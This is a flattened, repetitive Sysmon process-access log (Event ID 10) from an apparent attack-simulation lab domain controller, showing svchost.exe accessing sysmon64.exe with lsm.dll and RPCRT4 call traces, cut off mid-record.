13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C